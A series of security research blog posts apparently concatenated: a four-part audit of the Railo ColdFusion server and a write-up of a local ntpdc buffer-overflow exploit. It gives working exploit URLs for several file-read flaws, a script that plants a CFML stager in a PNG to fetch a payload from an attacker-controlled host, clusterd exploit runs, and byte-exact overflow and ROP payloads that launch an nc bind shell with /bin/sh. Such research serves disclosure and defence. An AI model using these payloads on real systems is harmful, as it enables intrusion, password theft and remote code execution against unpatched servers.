Here we invoke getId which, if the id is null, calls down into an overloaded getId that takes a security key and a security token, along with a boolean (false) and a global securityKey value as the default. Here’s the function in its entirety:
public static String getId(String key, String token, boolean addMacAddress, String defaultValue) {
    try {
        if(addMacAddress){ // because this was new we could swutch to a new ecryption // FUTURE cold we get rid of the old one?
            return Hash.sha256(key+";"+token+":"+SystemUtil.getMacAddress());
        }
        return Md5.getDigestAsString(key+token);
    }
    catch (Throwable t) {
        return defaultValue;
    }
}
Our ID generation is becoming clear; it’s essentially the MD5 of key + token, the key being returned from getSecurityKey and the token coming from getSecurityToken. These functions are simply getters for private global variables in the ConfigImpl class, but tracking down their generation is fairly trivial. All state initialization takes place in ConfigWebFactory.java. Let’s first check out the security key:
Okay, so our key is a randomly generated UUID from the safehaus library. This isn’t very likely to be guessed/brute-forced, but the value is written to a file in a consistent place. We’ll return to this.
The second value we need to calculate is the security token, which is set in ConfigImpl:
Gah! This is predictable/leaked! The token is simply the MD5 of our configuration directory, which in my case is C:\Documents and Settings\bryan\My Documents\Downloads\railo-express-4.0.4.001-jre-win32\webapps\www\WEB-INF\railo. So let’s see if this works.
We MD5 the directory (20132193c7031326cab946ef86be8c74), then prepend the random UUID (securityKey) and MD5 the result to finally get:
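In Python terms, a quick sketch of the scheme (the UUID below is obviously a placeholder for the real securityKey pulled from the id file):

import hashlib

config_dir = r"C:\Documents and Settings\bryan\My Documents\Downloads\railo-express-4.0.4.001-jre-win32\webapps\www\WEB-INF\railo"
security_key = "00000000-0000-0000-0000-000000000000"   # placeholder for the UUID stored in the 'id' file

token = hashlib.md5(config_dir.encode()).hexdigest()     # should line up with the 20132193... value above
session_id = hashlib.md5((security_key + token).encode()).hexdigest()
print("web-%s.cfm" % session_id)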
Ah-ha! Our session file will then be web-a898c2525c001da402234da94f336d55.cfm, which exactly lines up with what we’re seeing:
I mentioned that the config directory is leaked; default Railo is pretty promiscuous:
As you can see, from this we can derive the base configuration directory and figure out one half of the session filename. We now turn our attention to figuring out exactly what the securityKey is; if we recall, this is a randomly generated UUID that is then written out to a file called id.
There are two options here: one, guess or predict it, or two, pull the file with an LFI. As alluded to in part one, we can set the error handler to any file on the system we want. Since we’re in the mood to discuss post-authentication issues, we can harness this to fetch the id file containing this UUID:
When we then access a non-existent page, we trigger the template and the system returns our file:
By combining these specific vectors and inherent weaknesses in the Railo architecture, we can obtain post-authentication RCE without forcing the server to connect back. This can be particularly useful when the Task Scheduler just isn’t an option. This vulnerability has been implemented into clusterd as an auxiliary module, and is available in the latest dev build (0.3.1). A quick example of this:
I mentioned briefly at the start of this post that there were “several” post-authentication RCE vulnerabilities. Yes. Several. The one documented above was fun to find and figure out, but there is another way that’s much cleaner. Railo has a function that allows administrators to set logging information, such as level, type, and location. It also allows you to create your own logging handlers:
Here we’re building an HTML-layout log file that will append all ERROR entries to the file. We notice we can configure the path and the title. And the log extension. Easy win. By modifying the path to /context/my_file.cfm and setting the title to <cfdump var="#session#">, we can execute arbitrary CFML on the server and work our way to shell access. For some reason the file is not created when you create the log, but only once you select Edit and then Submit. Here’s the HTML output that’s stuck into the file by default:
Note our title contains the injected command. Here’s execution:
Using this method we can, again, inject a shell without requiring the use of any reverse connections, though that option is of course available with the help of the cfhttp tag.
Another fun post-authentication feature is the use of data sources. In Railo, you can craft a custom data source, which is a user-defined database abstraction that can be used as a filesystem. Here’s the definition of a MySQL data source:
With this defined, we can set all client session data to be stored in the database, allowing us to harvest session ID’s and plaintext credentials (see part one). Once the session storage is set to the created database, a new table will be created (cf_session_data) that will contain all relevant session information, including symmetrically-encrypted passwords.
Part three and four of this series will begin to dive into the good stuff, where we’ll discuss several pre-authentication vulnerabilities that we can use to obtain credentials and remote code execution on a Railo host.
This post continues our four-part Railo security analysis with three pre-authentication LFI vulnerabilities. These allow anonymous users to retrieve the administrative plaintext password and log in to the server’s administrative interfaces. If you’re unfamiliar with Railo, I recommend at the very least reading part one of this series. The most significant LFI discussed has been implemented as an auxiliary module in clusterd, though they’re all pretty trivial to exploit on their own.
We’ll kick this portion off with a pre-authentication LFI vulnerability that affects all versions of Railo Express; if you’re unfamiliar with the Express install, it’s really just a self-contained, no-installation-necessary package that harnesses Jetty to host the service. The flaw actually has nothing to do with Railo itself, but rather with this packaged web server, Jetty. CVE-2007-6672 addresses the issue, but it appears that the Railo folks have not bothered to update their bundled Jetty. Via the browser, we can pull the config file, complete with the admin hash, with http://[host]:8888/railo-context/admin/..\..\railo-web.xml.cfm.
A quick run of this in clusterd on Railo 4.0:
$ ./clusterd.py -i 192.168.1.219 -a railo -v4.0 --rl-pw
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-15 06:25PM] Started at 2014-05-15 06:25PM
[2014-05-15 06:25PM] Servers' OS hinted at windows
[2014-05-15 06:25PM] Fingerprinting host '192.168.1.219'
[2014-05-15 06:25PM] Server hinted at 'railo'
[2014-05-15 06:25PM] Checking railo version 4.0 Railo Server...
[2014-05-15 06:25PM] Checking railo version 4.0 Railo Server Administrator...
[2014-05-15 06:25PM] Checking railo version 4.0 Railo Web Administrator...
[2014-05-15 06:25PM] Matched 3 fingerprints for service railo
[2014-05-15 06:25PM] Railo Server (version 4.0)
[2014-05-15 06:25PM] Railo Server Administrator (version 4.0)
[2014-05-15 06:25PM] Railo Web Administrator (version 4.0)
[2014-05-15 06:25PM] Fingerprinting completed.
[2014-05-15 06:25PM] Attempting to pull password...
[2014-05-15 06:25PM] Fetched encrypted password, decrypting...
[2014-05-15 06:25PM] Decrypted password: default
[2014-05-15 06:25PM] Finished at 2014-05-15 06:25PM
and on the latest release of Railo, 4.2:
$ ./clusterd.py -i 192.168.1.219 -a railo -v4.2 --rl-pw
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-15 06:28PM] Started at 2014-05-15 06:28PM
[2014-05-15 06:28PM] Servers' OS hinted at windows
[2014-05-15 06:28PM] Fingerprinting host '192.168.1.219'
[2014-05-15 06:28PM] Server hinted at 'railo'
[2014-05-15 06:28PM] Checking railo version 4.2 Railo Server...
[2014-05-15 06:28PM] Checking railo version 4.2 Railo Server Administrator...
[2014-05-15 06:28PM] Checking railo version 4.2 Railo Web Administrator...
[2014-05-15 06:28PM] Matched 3 fingerprints for service railo
[2014-05-15 06:28PM] Railo Server (version 4.2)
[2014-05-15 06:28PM] Railo Server Administrator (version 4.2)
[2014-05-15 06:28PM] Railo Web Administrator (version 4.2)
[2014-05-15 06:28PM] Fingerprinting completed.
[2014-05-15 06:28PM] Attempting to pull password...
[2014-05-15 06:28PM] Fetched password hash: d34535cb71909c4821babec3396474d35a978948455a3284fd4e1bc9c547f58b
[2014-05-15 06:28PM] Finished at 2014-05-15 06:28PM
Using this LFI, we can pull the railo-web.xml.cfm file, which contains the administrative password. Notice that 4.2 only dumps a hash, whilst 4.0 dumps a plaintext password. This is because versions <= 4.0 Blowfish-encrypt the password, while versions > 4.0 actually hash it. Here’s the relevant code from Railo (ConfigWebFactory.java):
private static void loadRailoConfig(ConfigServerImpl configServer, ConfigImpl config, Document doc) throws IOException {
    Element railoConfiguration = doc.getDocumentElement();

    // password
    String hpw = railoConfiguration.getAttribute("pw");
    if(StringUtil.isEmpty(hpw)) {
        // old password type
        String pwEnc = railoConfiguration.getAttribute("password"); // encrypted password (reversable)
        if (!StringUtil.isEmpty(pwEnc)) {
            String pwDec = new BlowfishEasy("tpwisgh").decryptString(pwEnc);
            hpw = hash(pwDec);
        }
    }
    if(!StringUtil.isEmpty(hpw))
        config.setPassword(hpw);
    else if (configServer != null) {
        config.setPassword(configServer.getDefaultPassword());
    }
As shown above, they encrypt the password using a hard-coded symmetric key; this is where versions <= 4.0 stop. In > 4.0, after decryption they hash the password (SHA-256) and use that. Note that in > 4.0 the stored value is no longer a reversibly encrypted password, so we cannot simply decrypt it to use and abuse.
Due to the configuration of the web server, we can only pull CFM files; this is fine for the configuration file, but system files prove troublesome…
The second LFI is a trivial XXE that affects versions <= 4.0, and is exploitable out-of-the-box with Metasploit. Unlike the Jetty LFI, this affects both flavors of Railo, installed and Express:
Using this we cannot pull railo-web.xml.cfm, because it contains XML headers, and we cannot use the standard OOB methods for retrieving files. Timothy Morgan gave a great talk at OWASP AppSec 2013 that detailed a neat way of abusing Java XML parsers to obtain RCE via XXE. The process is pretty interesting: if you submit a URL with a jar:// protocol handler, the server will download the zip/jar to a temporary location, perform some header parsing, and then delete it. However, if you push the file and leave the connection open, the file will persist. This vector, combined with one of the other LFIs, could make for a reliable pre-authentication RCE, but I was unable to get it working.
The third LFI is just as trivial as the first two, and again stems from the pandemic problem of failing to authenticate at the URL/page level. img.cfm is a file used to, you guessed it, pull images from the system for display. Unfortunately, it fails to sanitize anything:
By fetching this page with attributes.src set to another CFM file off elsewhere, we can load the file and execute any tags contained therein. As we’ve done above, lets grab railo-web.xml.cfm; we can do this with the following url: http://host:8888/railo-context/admin/img.cfm?attributes.src=../../../../railo-web.xml&thistag.executionmode=start which simply returns
This vulnerability exists in 3.3 – 4.2.1 (latest), and is exploitable out-of-the-box on both Railo installed and Express editions. Though you can only pull CFM files, the configuration file dumps plenty of juicy information. It may also be beneficial for custom tags, plugins, and custom applications that may house other vulnerable/sensitive information hidden away from the URL.
Curiously, at first glance it looks like it may be possible to turn this LFI into an RFI. Unfortunately it’s not quite that simple; if we attempt to access a non-existent file, we see the following:
The error occurred in zip://C:\Documents and Settings\bryan\My Documents\Downloads\railo\railo-express-4.2.1.000-jre-win32\webapps\ROOT\WEB-INF\railo\context\railo-context.ra!/admin/img.cfm: line 29
Notice the zip:// handler. This prevents us from injecting a path to a remote host with any other handler. If, however, the tag looked like this:
<cfinclude>#attributes.src#</cfinclude>
Then it would have been trivially exploitable via RFI. As it stands, it’s not possible to modify the handler without prior code execution.
To sum up the LFIs: all versions and all install types are vulnerable via the img.cfm vector. All versions of the Express edition are vulnerable via the Jetty LFI. Versions <= 4.0, in both install types, are vulnerable to the XXE vector. This gives us reliable LFI in all current versions of Railo.
This concludes our pre-authentication LFI portion of this assessment, which will crescendo with our final post detailing several pre-authentication RCE vulnerabilities. I expect a quick turnaround for part four, and hope to have it out in a few days. Stay tuned!
This post concludes our deep dive into the Railo application server by detailing not one, but two pre-auth remote code execution vulnerabilities. If you’ve skipped the first three parts of this series to get to the juicy stuff, I don’t blame you, but I do recommend going back and reading them; there’s some important information and detail back there. In this post, we’ll document both vulnerabilities from start to finish, along with some demonstrations and notes on clusterd’s implementation of one of them.
The first RCE vulnerability affects versions 4.1 and 4.2.x of Railo, 4.2.1 being the latest release. Our vulnerability begins with the file thumbnail.cfm, which Railo uses to store admin thumbnails as static content on the server. As previously noted, Railo relies on authentication measures via the cfadmin tag, and thus none of the cfm files actually contain authentication routines themselves.
thumbnail.cfm first generates a hash of the image along with its width and height:
The cffile tag is used to read the raw image and then cast it via the cfimage tag. The wonderful thing about cffile is that we can provide URLs that it will arbitrarily retrieve. So, our URL can be this:
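Something like the following (the parameter names are what I recall the page accepting, so verify them against thumbnail.cfm itself):

http://host:8888/railo-context/admin/thumbnail.cfm?img=http://attacker:8000/evil.png&width=5000&height=5000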
And Railo will go and fetch the image and cast it. Note that if a height and width are not provided it will attempt to resize it; we don’t want this, and thus we provide large width and height values. This file is written out to /railo/temp/admin-ext-thumbnails/[HASH].[EXTENSION].
We’ve now successfully written a file onto the remote system, and need a way to retrieve it. The temp folder is not accessible from the web root, so we need some sort of LFI to fetch it. Enter jsloader.cfc.
jsloader.cfc is a Railo component used to fetch and load Javascript files. In this file is a CF tag called get, which accepts a single argument lib, which the tag will read and return. We can use this to fetch arbitrary Javascript files on the system and load them onto the page. Note that it MUST be a Javascript file, as the extension is hard-coded into the file and null bytes don’t work here, like they would in PHP. Here’s the relevant code:
<cfset var filePath = expandPath('js/#arguments.lib#.js')/>
<cfset var local = {result=""} /><cfcontent type="text/javascript">
<cfsavecontent variable="local.result">
<cfif fileExists(filePath)>
<cfinclude template="js/#arguments.lib#.js"/>
</cfif>
</cfsavecontent>
<cfreturn local.result />
Let’s tie all this together. Using thumbnail.cfm, we can write well-formed images to the file system, and using the jsloader.cfc file, we can read arbitrary Javascript. Recall how log injection works with PHP: we can inject PHP tags into arbitrary files so long as the file is loaded by PHP and parsed accordingly. We can fill a file full of junk, but if the parser has its way, a single <?php phpinfo(); ?> will be discovered and executed; the CFML engine works the same way.
Our attack becomes much more clear: we generate a well-formed PNG file, embed CFML code into the image (metadata), set the extension to .js, and write it via thumbnail.cfm. We then retrieve the file via jsloader.cfc and, because we’re loading it with a CFM file, it will be parsed and executed. Let’s check this out:
$ ./clusterd.py -i 192.168.1.219 -a railo -v4.1 --deploy ./src/lib/resources/cmd.cfml --deployer jsload
clusterd/0.3.1 - clustered attack toolkit
[Supporting 6 platforms]
[2014-06-15 03:39PM] Started at 2014-06-15 03:39PM
[2014-06-15 03:39PM] Servers' OS hinted at windows
[2014-06-15 03:39PM] Fingerprinting host '192.168.1.219'
[2014-06-15 03:39PM] Server hinted at 'railo'
[2014-06-15 03:39PM] Checking railo version 4.1 Railo Server...
[2014-06-15 03:39PM] Checking railo version 4.1 Railo Server Administrator...
[2014-06-15 03:39PM] Checking railo version 4.1 Railo Web Administrator...
[2014-06-15 03:39PM] Matched 2 fingerprints for service railo
[2014-06-15 03:39PM] Railo Server Administrator (version 4.1)
[2014-06-15 03:39PM] Railo Web Administrator (version 4.1)
[2014-06-15 03:39PM] Fingerprinting completed.
[2014-06-15 03:39PM] This deployer (jsload_lfi) requires an external listening port (8000). Continue? [Y/n] >
[2014-06-15 03:39PM] Preparing to deploy cmd.cfml...
[2014-06-15 03:40PM] Waiting for remote server to download file [5s]]
[2014-06-15 03:40PM] Invoking stager and deploying payload...
[2014-06-15 03:40PM] Waiting for remote server to download file [7s]]
[2014-06-15 03:40PM] cmd.cfml deployed at /railo-context/cmd.cfml
[2014-06-15 03:40PM] Finished at 2014-06-15 03:40PM
A couple things to note: as you may notice, the module currently requires the Railo server to connect back twice, once for the image with embedded CFML and once for the payload. We embed only a stager in the image, which then connects back for the actual payload.
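Building the poisoned image is the simple part; here’s a rough sketch (the CFML stager string is illustrative, not the exact one the module uses):

# Append a CFML stager to a valid PNG; thumbnail.cfm treats the result as an
# image, while the CFML engine later finds and executes the embedded tags.
stager = '<cfhttp method="get" url="http://192.168.1.6:8000/cmd.cfml" path="#ExpandPath(\'./\')#" file="cmd.cfml">'

with open("valid.png", "rb") as f:
    png = f.read()

# Served with a .js name so the remote copy lands as [HASH].js, reachable by jsloader.cfc or img.cfm later
with open("evil.js", "wb") as f:
    f.write(png + stager.encode())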
Sadly, the LFI was unknowingly killed in 4.2.1 with the following fix to jsloader.cfc:
The arguments.lib variable still contains our controllable path, but the fix kills our ability to traverse out. Unfortunately, we can’t substitute the .. with unicode or UTF-16 tricks due to the way Jetty and Java are configured by default. This file is pretty much useless to us now, unless we can write into the folder that jsloader.cfc reads from; then we don’t need to traverse out at all.
We can still pop this on Express installs, due to the Jetty LFI discussed in part 3. By simply traversing into the extensions folder, we can load up the Javascript file and execute our shell. Railo installs still prove elusive.
buuuuuuuuuuuuuuuuuuuuuuuuut
Recall the img.cfm LFI from part 3; by tip-toeing back into the admin-ext-thumbnails folder, we can summon our vulnerable image and execute whatever coldfusion we shove into it. This proves to be an even better choice than jsloader.cfc, as we don’t need to traverse as far. This bug only affects versions 4.1 – 4.2.1, as thumbnail.cfm wasn’t added until 4.1. CVE-2014-5468 has been assigned to this issue.
The second RCE vulnerability is a bit easier and has a larger attack surface, spanning all versions of Railo. As previously noted, Railo does not do per-page/URL authentication, but rather enforces it when making changes via the <cfadmin> tag. Because of this, any page doing naughty things without checking with that tag may be exploitable, as previously seen. Another such file is overview.uploadNewLangFile.cfm:
The tricky bit is where it’s written to; Railo uses a compression system that dynamically generates compressed versions of the web server, contained within railo-context.ra. A mirror of these can be found under the following:
[ROOT]\webapps\ROOT\WEB-INF\railo\temp\compress
The compressed data is then obfuscated behind two more folders, both MD5s. In my example, it becomes:
So we cannot simply traverse into this path, as the hashes change every single time a file is added, removed, or modified. I’ll walk through the logic used to generate these but, as a spoiler, we aren’t going to figure them out without some other fashionable info-disclosure bug.
The hashes are calculated in railo-java/railo-core/src/railo/commons/io/res/type/compress/Compress.java:
The first hash is then cid + "-" + ffile.getAbsolutePath(), where cid is the randomly generated ID found in the id file (see part two) and ffile.getAbsolutePath() is the full path to the classes resource. This is doable if we have the XXE, but 4.1+ is inaccessible.
The second hash is actLastMode + ":" + ffile.length(), where actLastMode is the last modified time of the file and ffile.length() is the obvious file length. Again, this is likely not brute-forceable without a serious infoleak vulnerability. Hosts <= 4.0 are exploitable, as we can list files with the XXE via the following:
[email protected]:~/tools/clusterd$ python http_test_xxe.py
88d817d1b3c2c6d65e50308ef88e579c
[SNIP - in which we modify the path to include ^]
[email protected]:~/tools/clusterd$ python http_test_xxe.py
0bdbf4d66d61a71378f032ce338258f2
[SNIP - in which we modify the path to include ^]
[email protected]:~/tools/clusterd$ python http_test_xxe.py
admin
admin_cfc$cf.class
admin_cfm$cf.class
application_cfc$cf.class
application_cfm$cf.class
component_cfc$cf.class
component_dump_cfm450$cf.class
doc
doc_cfm$cf.class
form_cfm$cf.class
gateway
graph_cfm$cf.class
jquery_blockui_js_cfm1012$cf.class
jquery_js_cfm322$cf.class
META-INF
railo_applet_cfm270$cf.class
res
templates
wddx_cfm$cf.class
http_test_xxe.py is just a small hack I wrote to exploit the XXE, in which we eventually obtain both valid hashes. So we can exploit this in versions <= 4.0 Express. Later versions, as far as I can find, have no discernible way of obtaining full RCE without another infoleak or resorting to a slow, loud, painful death of brute forcing two MD5 hashes.
The first RCE is currently available in clusterd dev, and a PR is being made to Metasploit thanks to @BrandonPrry. Hopefully it can be merged shortly.
As we conclude our Railo analysis, let’s quickly recap the vulnerabilities discovered during this audit:
Version 4.2:
- Pre-authentication LFI via `img.cfm` (Install/Express)
- Pre-authentication LFI via Jetty CVE (Express)
- Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
- Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express) (Up to version 4.2.0)
Version 4.1:
- Pre-authentication LFI via `img.cfm` (Install/Express)
- Pre-authentication LFI via Jetty CVE (Express)
- Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
- Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express)
Version 4.0:
- Pre-authentication LFI via XXE (Install/Express)
- Pre-authentication LFI via Jetty CVE (Express)
- Pre-authentication LFI via `img.cfm` (Install/Express)
- Pre-authentication RCE via XXE and `overview.uploadNewLangFile` (Install/Express)
- Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express)
- Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
Version 3.x:
- Pre-authentication LFI via `img.cfm` (Install/Express)
- Pre-authentication LFI via Jetty CVE (Express)
- Pre-authentication LFI via XXE (Install/Express)
- Pre-authentication RCE via XXE and `overview.uploadNewLangFile` (Express)
This does not include the random XSS bugs or post-authentication issues. At the end of it all, this appears to be a framework with great ideas, but desperately in need of code TLC. Driving forward with a checklist of features may look nice on a README page, but the desolate wasteland of code left behind can be a scary thing. Hopefully the Railo guys take note and spend some serious time evaluating and improving existing code. The bugs found during this series have been disclosed to the developers; here’s to hoping they follow through.
Alejandro Hdez (@nitr0usmx) recently tweeted about a trivial buffer overflow in ntpdc, a deprecated NTP query tool still available and packaged with any NTP install. He posted a screenshot of the crash, the result of a large buffer passed into a vulnerable gets call. After digging into it a bit, I decided it’d be a fun exploit to write, and it was. There are a few quirks to it that make it of particular interest, which I’ve detailed below.
As noted, the bug is the result of a vulnerable gets, which can be crashed with the following:
And the result of Debian’s recommended hardening-check:
$ hardening-check /usr/bin/ntpdc
/usr/bin/ntpdc:
Position Independent Executable: no, normal executable!
Stack protected: yes
Fortify Source functions: yes (some protected functions found)
Read-only relocations: yes
Immediate binding: no, not found!
Interestingly enough, I discovered this oddity after I had gained code execution in a place I shouldn’t have. We’re also running with ASLR enabled:
$ cat /proc/sys/kernel/randomize_va_space
2
I’ll explain why the above is interesting in a moment.
So in our current state, we control three registers and an instruction dereferencing ESI+0x14. If we take a look just a few instructions ahead, we see the following:
gdb-peda$ x/8i $eip
=> 0xb7fa1d76 <el_gets+22>: mov eax,DWORD PTR [esi+0x14] ; deref ESI+0x14 and move into EAX
0xb7fa1d79 <el_gets+25>: test al,0x2 ; test lower byte against 0x2
0xb7fa1d7b <el_gets+27>: je 0xb7fa1df8 <el_gets+152> ; jump if ZF == 1
0xb7fa1d7d <el_gets+29>: mov ebp,DWORD PTR [esi+0x2c] ; doesnt matter
0xb7fa1d80 <el_gets+32>: mov DWORD PTR [esp+0x4],ebp ; doesnt matter
0xb7fa1d84 <el_gets+36>: mov DWORD PTR [esp],esi ; doesnt matter
0xb7fa1d87 <el_gets+39>: call DWORD PTR [esi+0x318] ; call a controllable pointer
I’ve detailed the instructions above, but essentially we’ve got a free CALL. In order to reach this, we need an ESI value that at +0x14 will set ZF == 0 (to bypass the test/je) and at +0x318 will point into controlled data.
Naturally, we should figure out where our payload junk is and go from there.
gdb-peda$ searchmem 0x41414141
Searching for '0x41414141' in: None ranges
Found 751 results, display max 256 items:
ntpdc : 0x806ab00 ('A' <repeats 200 times>...)
gdb-peda$ maintenance i sections
[snip]
0x806a400->0x806edc8 at 0x00021400: .bss ALLOC
gdb-peda$ vmmap
Start End Perm Name
0x08048000 0x08068000 r-xp /usr/bin/ntpdc
0x08068000 0x08069000 r--p /usr/bin/ntpdc
0x08069000 0x0806b000 rw-p /usr/bin/ntpdc
[snip]
Our payload is copied into BSS, which is beneficial as this will remain unaffected by ASLR, with further bonus points because our binary wasn’t compiled with PIE. We now need to move back -0x318 and look for a value that will set ZF == 0 with the test al,0x2 instruction. A value at 0x806a9e1 satisfies both the +0x14 and +0x318 requirements:
Now that we’ve got EIP, it’s a simple matter of stack pivoting to execute a ROP payload. Let’s figure out where that "C"*600 lands in memory and redirect EIP there:
Er, what? It appears to be executing code in BSS! Recall the output of paxtest/checksec/hardening-check from earlier: NX was clearly enabled. This took me a few hours to figure out, but it ultimately came down to Debian not distributing x86 images with PAE, or Physical Address Extension, enabled. PAE is a kernel feature that allows 32-bit CPUs to address more physical memory by adding a third level of paging and doubling the size of each page table and page directory entry. That wider entry is what makes NX possible on x86, because NX is implemented as a single ‘don’t execute’ bit in the enlarged page table entry. You can read more about PAE here, and the original NX patch here.
This flag can be tested for with a simple grep of /proc/cpuinfo; on a fresh install of Debian 7, a grep for PAE will turn up empty, but on something with support, such as Ubuntu, you’ll get the flag back.
Because I had come this far already, I figured I might as well get the exploit working. At this point it was simple, anyway:
$ python -c 'print "A"*485 + "\x3c\xad\x06\x08" + "A"*79 + "\xcd\xa9\x06\x08" + "\x90"*4 + "\x68\xec\xf7\xff\xbf\x68\x70\xe2\xc8\xb7\x68\x30\xac\xc9\xb7\xc3"' > input2.file
$ gdb -q /usr/bin/ntpdc
Reading symbols from /usr/bin/ntpdc...(no debugging symbols found)...done.
gdb-peda$ r < input.file
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
***Command `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<�AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAͩ����h����hp�ȷh0�ɷ�' unknown
[New process 4396]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
process 4396 is executing new program: /bin/dash
[New process 4397]
process 4397 is executing new program: /bin/nc.traditional
This uses a simple system payload with hard-coded addresses, because at this point it’s an old-school, CTF-style exploit. And it works. With this trivial PoC working, I decided to check another box I had to see whether this was a common distribution configuration. An Ubuntu VM said otherwise:
$ uname -a
Linux bryan-VirtualBox 3.2.0-74-generic #109-Ubuntu SMP Tue Dec 9 16:47:54 UTC 2014 i686 i686 i386 GNU/Linux
$ ./checksec.sh --file /usr/bin/ntpdc
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH /usr/bin/ntpdc
$ cat /proc/sys/kernel/randomize_va_space
2
Quite a different story. We need to bypass full RELRO (no GOT overwrites), PIE+ASLR, NX, SSP, and ASCII armor. In our current state, things are looking pretty grim. As an aside, it’s important to remember that because this is a local exploit, the attacker is assumed to have limited control over the system. Ergo, an attacker may inspect and modify the system in the same manner a limited user could. This becomes important with a few techniques we’re going to use moving forward.
Our first priority is stack pivoting; we won’t be able to ROP to victory without control over the stack. There are a few options for this, but the easiest is likely going to be an ADD ESP, ? gadget. The problem with this is that we need to have some sort of control over the stack, or be able to shift ESP somewhere into BSS that we control. Looking at the output of ropgadget, we’ve got 36 options, almost all of which are of the form ADD ESP, ?.
After looking through the list, I determined that none of the values led to control over the stack; in fact, nothing I injected landed on the stack. I did note, however, the following:
gdb-peda$ x/6i 0x800143e0
0x800143e0: add esp,0x256c
0x800143e6: pop ebx
0x800143e7: pop esi
0x800143e8: pop edi
0x800143e9: pop ebp
0x800143ea: ret
gdb-peda$ x/30s $esp+0x256c
0xbffff3a4: "-1420310755.557158-104120677"
0xbffff3c1: "WINDOWID=69206020"
0xbffff3d3: "GNOME_KEYRING_CONTROL=/tmp/keyring-iBX3uM"
0xbffff3fd: "GTK_MODULES=canberra-gtk-module:canberra-gtk-module"
These are environment variables passed into the application and located on the program stack. Using the ROP gadget ADD ESP, 0x256c, followed by a series of register POPs, we could land here. Controlling this is easy with the help of LD_PRELOAD, a neat trick documented by Dan Rosenberg in 2010. By exporting LD_PRELOAD, we can control uninitialized data located on the stack, as follows:
This gives us EIP, control over the stack, and control over a decent number of registers; however, the LD_PRELOAD trick is extremely sensitive to stack shifting, which represents a pretty big problem for exploit portability. For now, I’m going to forget about it; chances are we could brute force the offset, if necessary, or simply invoke the application with env -i.
From here, we need to figure out a ROP payload. The easiest payload I can think of is a simple ret2libc. Unfortunately, ASCII armor leaves null bytes in all of the relevant libc addresses:
gdb-peda$ vmmap
0x00327000 0x004cb000 r-xp /lib/i386-linux-gnu/libc-2.15.so
0x004cb000 0x004cd000 r--p /lib/i386-linux-gnu/libc-2.15.so
0x004cd000 0x004ce000 rw-p /lib/i386-linux-gnu/libc-2.15.so
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x366060 <system>
gdb-peda$
One idea I had was to simply construct the address in memory, then call it. Using ROPgadget, I hunted for ADD/SUB instructions that modified any registers we controlled. Eventually, I discovered this gem:
0x800138f2: add edi, esi; ret 0;
0x80022073: call edi
Using the above, we could pop controlled, non-null values into EDI/ESI that, when added, equal 0x366060 <system>. Many pairs will work, but I chose 0xeeffffff + 0x11366061; the sum is 0x100366060, which truncates to 0x00366060 in a 32-bit register without either operand containing a null byte:
As shown above, we’ve got our two values in EDI/ESI and are returning to our ADD EDI, ESI gadget. Once this completes, we return to our CALL EDI gadget, which will jump into system:
EDI: 0x366060 (<system>: sub esp,0x1c)
EBP: 0x41414141 ('AAAA')
ESP: 0xbfffefc0 --> 0xbffff60d ("/bin/nc -lp 5544 -e /bin/sh")
EIP: 0x80022073 --> 0xd7ff
EFLAGS: 0x217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0x80022073: call edi
Recall the format of a ret2libc: [system() address | exit() | shell command]; therefore, we need to stick a bogus exit address (in my case, junk) as well as the address of a command. Also remember, however, that CALL EDI is essentially a macro for PUSH EIP+2 ; JMP EDI. This means that our stack will be tainted with the address @ EIP+2. Thanks to this, we don’t really need to add an exit address, as one will be added for us. There are, unfortunately, no JMP EDI gadgets in the binary, so we’re stuck with a messy exit.
This culminates in:
$ export LD_PRELOAD=`python -c 'print "A"*8472 + "\xff\xff\xff\xee" + "\x61\x60\x36\x11" + "AAAA" + "\xf2\x38\x01\x80" + "\x73\x20\x02\x80" + "\x0d\xf6\xff\xbf" + "C"*1492'`
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
[snip all the LD_PRELOAD crap]
[New process 31184]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
process 31184 is executing new program: /bin/dash
[New process 31185]
process 31185 is executing new program: /bin/nc.traditional
Success! Though this is a very dirty hack, and makes no claim of portability, it works. As noted previously, we can brute force the image base and stack offsets, though we can also execute the binary with an empty environment and no stack tampering with env -i, giving us a much higher chance of hitting our mark.
